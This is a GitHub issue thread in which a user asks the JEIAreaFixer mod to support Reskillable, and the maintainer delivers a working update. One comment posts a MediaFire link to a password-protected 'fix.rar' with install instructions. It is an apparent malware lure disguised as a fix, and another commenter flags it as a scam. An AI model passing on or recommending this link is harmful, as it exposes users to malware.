### ISSUE TITLE
Add support for Reskillable

### ISSUE THREAD

**Issue by juraj-hrivnak** [ZZZank/JEIAreaFixer#1]
Reskillable tabs clash with the JEI bookmarks. It would be awesome to have that fixed.

Image:
![reskillable_bug](https://github.com/user-attachments/assets/35963ee7-399a-4494-be2e-64b10621385d)

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by juraj-hrivnak** [comment]
^ Scammer

**Comment by ZZZank** [comment]
1.3.0 will soon be avaliable on CurseForge, with supports for Reskillable, do give it a try and possibly go through some tests and provide feedbacks. I didn't encounter any issue during my test, but I'm not familiar with Reskillable after all

**Comment by juraj-hrivnak** [comment]
Thanks bro! It works like a charm! This is an awesome mod.
